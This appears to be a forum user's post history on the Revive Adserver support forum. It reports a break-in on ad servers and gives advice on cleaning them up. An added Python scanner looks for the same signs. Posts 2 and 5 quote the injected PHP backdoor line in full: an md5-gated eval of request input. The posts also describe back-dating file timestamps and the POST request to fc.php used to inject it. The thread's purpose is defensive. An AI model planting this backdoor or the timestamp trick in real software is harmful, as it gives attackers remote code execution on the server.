Everything posted by tvvpmi

  1. tvvpmi

    revive Asynchronous JS hacked

    Yes. Timestamps have been changed as well. You can use the Linux command "stat" to see the modification and change timestamps. The attacker is changing the "modification time" to the parent folder's "modification time" so as not to raise suspicion. This code is inserted via a POST call to fc.php. To avoid being reinfected you can change write permissions on "plugins/bannerTypeText/oxText/genericText.delivery.php". Perhaps some Revive developer can tell us what the function of fc.php (front controller) is, to decide if we can disable it or not.
  2. tvvpmi

    Mobile ads have been hijacked

    Hi @vinmhas, I was in the same situation. You should review your file: plugins/bannerTypeText/oxText/genericText.delivery.php. Probably it has been modified, adding a line like this at the end: if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);} You have to remove it. Also you have to search in the "images folder" for some PHP script ... and remove it. Perhaps you can send it privately to @Ian vM. Clean the prepend code of your zones ... via SQL or through the Revive backend. Search for iframes and JavaScript code. Disable PHP execution on the image folder or move the image folder to "another place", as they are static files, and serve them through another subdomain. You don't need PHP for them.
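Added example, not part of the forum posts or of Revive Adserver: a small Python scanner for the three checks described in the two posts above (eval() on request input in a PHP file, PHP scripts inside the images folder, and a file whose modification time matches its parent folder while its change time is newer). The folder name `images`, the two-second tolerance and the sample tree are assumptions made for the example.

```python
import os
import re
import tempfile

# eval() fed straight from request input, the shape of the injected line quoted above.
EVAL_ON_INPUT = re.compile(rb"eval\s*\(\s*\$_(?:REQUEST|POST|GET|COOKIE)\b", re.I)
STATIC_DIRS = {"images"}   # assumption: folders that should hold only static files
SLACK = 2.0                # assumption: tolerance in seconds when comparing timestamps


def scan(root):
    """Return sorted (relative_path, reason) findings for PHP files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        parts = os.path.relpath(dirpath, root).split(os.sep)
        for name in (f for f in files if f.lower().endswith((".php", ".phtml"))):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                if EVAL_ON_INPUT.search(fh.read()):
                    findings.append((rel, "eval-on-request-input"))
            if STATIC_DIRS & set(parts):
                findings.append((rel, "php-in-static-dir"))
            st, parent = os.stat(path), os.stat(dirpath)
            # On Linux st_ctime is the inode change time; touch/utime cannot set it back.
            if abs(st.st_mtime - parent.st_mtime) < SLACK and st.st_ctime - st.st_mtime > SLACK:
                findings.append((rel, "mtime-backdated-to-parent"))
    return sorted(findings)


def make_sample():
    """Build a constructed sample tree (not real Revive files); return its path."""
    root = tempfile.mkdtemp()
    plug = os.path.join(root, "plugins", "bannerTypeText", "oxText")
    bad = os.path.join(plug, "genericText.delivery.php")
    os.makedirs(plug)
    os.makedirs(os.path.join(root, "images"))
    for path, body in [(bad, "<?php if(isset($_REQUEST['k'])){@eval($_REQUEST['zoneId']);}\n"),
                       (os.path.join(plug, "clean.php"), "<?php echo 'ok';\n"),
                       (os.path.join(root, "images", "x.php"), "<?php // placeholder\n")]:
        with open(path, "w") as fh:
            fh.write(body)
    for target in (bad, plug):   # back-date the file to its folder's mtime
        os.utime(target, (1500000000, 1500000000))
    return root


if __name__ == "__main__":
    print(*scan(make_sample()), sep="\n")
```

A newer change time also results from a legitimate chmod or rename, so a timestamp finding is a reason to inspect the file, not proof of tampering.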
  3. tvvpmi

    Mobile ads have been hijacked

    Message sent directly to @Ian vM
  4. tvvpmi

    Mobile ads have been hijacked

    I have more info. I have received another attack just now. I have the POST parameters the attacker is using. Is any admin interested in receiving them?
  5. tvvpmi

    Mobile ads have been hijacked

    Like in @snaggy's case, this line has been added at the end of genericText.delivery.php: if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='2817bce4ce1ba4d9361f5f24cf33747f'){@eval($_REQUEST['zoneId']);}
  6. tvvpmi

    Mobile ads have been hijacked

    Same here. From stat genericText.delivery.php 2018-12-22 08:51:50.724940460 +0100
  7. tvvpmi

    Mobile ads have been hijacked

    Last one, 4.1.4. I have upgraded from a prior version. But this installation comes from an old installation, 2.8 series. I have modified the fc.php script to log POST parameters. I'm waiting now for a new POST to check what we are receiving and to try to reproduce the attack.
  8. tvvpmi

    Mobile ads have been hijacked

    CONFIRMED: the point of code injection in the prepend zones is the same that @sunech has previously reported: [06/Jan/2019:12:22:53 +0100] "POST /www/delivery/fc.php?zoneid=0&script=bannerTypeText:oxText:genericText&Charset=UTF8&target=blank HTTP/1.1" 200 23 "https://google.com/serach?q=https://<adserver>/www/delivery&aqs=chrome.1.69i57j0j7&sourceid=chrome&ie=UTF-8" "AdsBot-Google (+http://www.google.com/adsbot.html)"
  9. tvvpmi

    Mobile ads have been hijacked

    The same problem here. I have access.log switched off, so I can't confirm where the injection is coming from. I have cleared all prepend code from the zones table in the DB, switched on logging, and am waiting for another injection wave.
  10. Yes. I know that. I have been using OpenX Source for a long time, and before that phpAdsNew, and now Revive Adserver. By new OpenX I mean that company. I don't know what software they are using in their services. Reading the link https://github.com/ampproject/amphtml/blob/master/ads/openx.md you can see that there is a parameter to set the host where the adserver is running. That makes me think that OpenX was the open source OpenX. Of course I have tried it with my private version of OpenX and it doesn't work. Inserting JavaScript inside the AMP works. I have to try what happens when the page is cached at the Google AMP cache.
  11. Hi. It is not working because in AMP you cannot include JavaScript code: https://www.ampproject.org/docs/reference/amp-ad.html There is support from OpenX right now (https://github.com/ampproject/amphtml/blob/master/ads/openx.md) but I think it is the "new" OpenX, not the Revive ancestor.